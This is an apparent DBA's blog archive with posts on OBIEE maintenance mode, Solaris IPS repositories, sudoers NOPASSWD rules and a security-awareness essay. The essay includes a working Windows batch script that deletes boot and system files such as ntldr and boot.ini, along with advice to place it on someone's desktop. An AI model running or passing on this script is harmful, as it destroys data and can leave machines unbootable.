Tuesday, August 25, 2015

System is in manitance mode. Please try again later OBIEE

When trying to update any reports in OBIEE the below errors appears :-







to solve this issue just follow the screen :-

1- Access to OBIEE Link http://ip-hostname:9704/analytics
2- Choose Administration from the upper right corner.


3- Turn Maintenance mode to off by press the link.




Good Luck.

Cheers
Osama

Sunday, August 23, 2015

Me, Security & Oracle

Lot of question came to my mind when I start talking about oracle security, How to secure my databases, what should I do?
Adding Firewall to my network is it enough? Enable Oracle Audit Parameter will be enough?

Understand Security as concept is very important to reduce risk of attack and to do that you should make your system is secure.
Having Security awareness is first step to secure the system.


According to RSA reports, there was 7% increase in amount of phishing attacks worldwide between months of July and August 2010, The United States currently leads as the country that suffered the most attacks in regards to online cyber threats with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.


The below Graph Show Number of network Security Breaches over Past 12 months (Graph Made by Ponemon Institute)


Included to above reports 1$ trillion the total value of intellectual property hackers stole from business around the world in 2008.
As proof for this I will mention three different stories for the biggest top “black hat” hackers

The below Graph Shown How much Did the Cyber-attack Cost Company over 12 month (Graph Made by Ponemon Institute)


Jonathan James when he hacked NASA he was 16 years old with that he was the first juvenile sent to the present, Installed backdoor into defense threats reductions agency server and  jacked into NASA Computers stealing software worth 1.7M $ Costing NASA 41,000$ in Repair.

Adrian Lamo Hacked into NY Times and Microsoft using wifi Coffee shop, Viewed Personal Information and High profile Subject matter

The last example Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.


Computer Hacking is usually used as stereotypes in movies and cartoons as Guy sitting behind desk with Pepsi Can and not that much luck with ladies , the truth is this guy cost people and companies money and privacy, therefor the hacking effects on individuals , organizations and company.

As individuals victims of computer hacking will lose their saving, privacy even their life, in the early days of computer the virus was the biggest security risk which is cause data losing. After that it’s replaced with malware which is small software designed to do job such as key logger or virus scanner but now this software not more any fun since the hackers now creating malware.

Nothing easier today than writing virus just to do annoying things, the below code just an example how writing a virus.

You can find step to write virus, Trojan or even worm on the internet and for free, this is what makes problem bigger, because internal user can read this information and start using them so you should prepare to all these kind of attacks.

The below example for simple virus, all you have to do is save as batch file and put it on someone desktop

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks


 What if the victims was company or organization, the small effect could happened by hacker is put some employees out of works for short period of time. The large affect hacker could stole company secrets and lose them data, and make some damage, the last survey for Ponemon Research on behalf of juniper Networks 90% of companies had been breached at least once by hackers over the past 12 months.60% reported two or more breaches over the past year.

So companies or organizations should spend small fortune for security purpose software and hardware and lets us don’t forget to educate our employee.

The Security today consider as most important priority for the company for two reasons:
1-      Personal Data protections.
If you store data you should secure these data, since it’s related to customers or clients.

2-      Social Responsibility. 

Some of these data very important and contain people privacy which indicate us that company should protect these information by secure their systems.

When you leave your house for works purpose in the morning or hanging out with friends in the evening you make sure that your house is secure why? All this to keep unauthorized people to access, damage and theft By enable alarm system, make sure your doors is lock and even your windows, this is the same for the companies or organizations same principle but with different approach, the valuable things in the computers and networks is the data you create, this is the first reasons why we have computers and networks. 

Operating system can be reinstalled, Hardware can be replaced but we talking about data which is unique and sometimes it is irreplaceable.
Data is confidential and people privacy, this is the main reason why you don’t want lose it, you don't want others to even view it without authorization , Visa information, mobile numbers, social numbers and account numbers.
If it’s left unprotected then information can be accessed by anyone, if these information fall into wrong hand, you’re live is nightmare, quite often ensure your data is protected is small price that you could pay to avoid future problems and prevent threats.

What if the data is not adequately protected, perhaps it compromised which called security breach, I am not talking here as individual level but as Business level that cause problems such as loss of reputation and lawsuits.
According to the Ponemon institute, cost of a Security breach during 2008 was $202 per record breached. Imagine if you have 1 Million records what is could cause to the company?

Intruders not care who you are or about your identity they just want to control your computer. By doing this they can hide their location and start attack.


By access to the system intruders discovers new vulnerabilities to exploit in computer software, don’t forget its networks which mean you can access to another computers on same network Complex right?


But what about the law, all the above information is just reports and security principle, check the below law that talks about security and data privacy.


Cheers
Osama Mustafa




Thursday, July 30, 2015

Presentation will be

There is no much left for 2015 but there is too much work waiting me, presenting in different country means a lot of work and preparation, i am still waiting different events but till now this is confirmed:-


  • SIOUG2015 -- Located In Slovenia.
  • HROUG2015 -- Located in Croatia 
  • OOW15 -- Located in SF, USA
  • UKOUG TECH15 -- Located in UK.

So Excited.


Cheers
Osama Mustafa

Database 12.1.0.2 Certified with EBS 12.2

After Waiting too long finally I can upgrade my Oracle EBS Database ,Regarding to Oracle Blog "Database 12.1.0.2 Certified with EBS 12.2".

You can Read more about this here

Cheers
Osama

Saturday, July 18, 2015

sorting algorithm


I have to share this Picture which is really amazing and include all the sorting algorithm in one picture 



video

Cheers
Osama 

Tuesday, July 14, 2015

create IPS repository in Solaris 11.2

I discussed before how to create package repository on Linux here, the same could be happened on Solaris 11.2 when you install Database any version mandatory packages should be installed to make it easy repository helps you a lot and will be available any time you need, and Image packaging system(IPS) repository is one of the important things in Solaris 11 onwards.

You need to download the following files & upload them to the server :-




Once the file is ready upload them to the server under one file called Repo for example. it should looks like the below :-

#ls -lrt
total 14373947
-rwx------   1 root     root     1771800121 Aug  9 08:24 sol-11_2-repo-1of4.zip
-rwx------   1 root     root     1889867782 Aug  9 11:20 sol-11_2-repo-2of4.zip
-rwx------   1 root     root     1902167161 Aug  9 22:34 sol-11_2-repo-3of4.zip
-rwx------   1 root     root     1790358735 Aug 10 00:16 sol-11_2-repo-4of4.zip
-rwx------   1 root     root        5594 Aug 10 20:16 install-repo.ksh
-rwx------   1 root     root         228 Aug 10 20:17 sol-11_2-repo-md5sums.txt
drwxr-xr-x   2 root     root           2 Aug 10 20:40 repo

#pkg publisher
PUBLISHER TYPE STATUS URI
solaris origin online http://pkg.oracle.com/solaris/release/
 as you see from the above output package publisher still working under oracle Link. Let's Start Working, Set the executable bit for install-repo.ksh and execute like below.

#./install-repo.ksh -d /export/oracle/repo/ -v -c
Comparing checksums of downloaded files...done. Checksums match.
Uncompressing sol-11_2-repo-1of4.zip...done.
Uncompressing sol-11_2-repo-2of4.zip...done.
Uncompressing sol-11_2-repo-3of4.zip...done.
Uncompressing sol-11_2-repo-4of4.zip...done.
Repository can be found in /export/oracle/repo/.
Initiating repository verification.

Again Check the current publisher.

#pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
solaris                     origin   online F http://pkg.oracle.com/solaris/release/

configure the new publisher, Path should be the same.

#pkg set-publisher -G '*' -M '*' -g file:///export/oracle/repo solaris
#pkg publisher
UBLISHER                   TYPE     STATUS P LOCATION
solaris                     origin   online F file:///export/oracle/repo

Configure the repository service to point to the new location by run the following command :-

# svccfg -s application/pkg/server setprop pkg/inst_root=/export/oracle/repo 

Check

# svcprop -p pkg/inst_root application/pkg/server
Reload the Services Just to confirm :-

# svcadm refresh application/pkg/server


Cheers
Osama Mustafa

Sunday, July 12, 2015

Use "sudo" Command without password Prompt

Sometimes you need to run Linux command without password prompt using sudo command.

to learn more about this command read the link here.

For Example i need to run the following command without password prompt, However there are three sudo commands I want to run without entering password:


  • sudo reboot
  • sudo shutdown -r now
  • sudo shutdown -P now

to do this follow the below steps :-

  • edit the following /etc/sudoers file.
  • you find the following lines depend on the username and hostname for the server.
user host = (root) NOPASSWD: /sbin/shutdown
user host = (root) NOPASSWD: /sbin/reboot

This will allow the user user to run the desired commands on host without entering a password. All other sudoed commands will still require a password.

Notes:

  • Always use the command visudo to edit the sudoers file to make sure you do not lock yourself out of the system for example 
sudo visudo -f /etc/sudoers.d/shutdown
  • Using /etc/sudoers.d instead of modifying /etc/sudoers, you could add the two lines to a new file in /etc/sudoers.d for example  /etc/sudoers.d/shutdown.
  • If you did not use visudo to edit your files and then accidentally messed up /etc/sudoers or messed up a file in /etc/sudoers.d then you will be locked out of sudo.to fix it use command pkexec.

Cheers
Osama Mustafa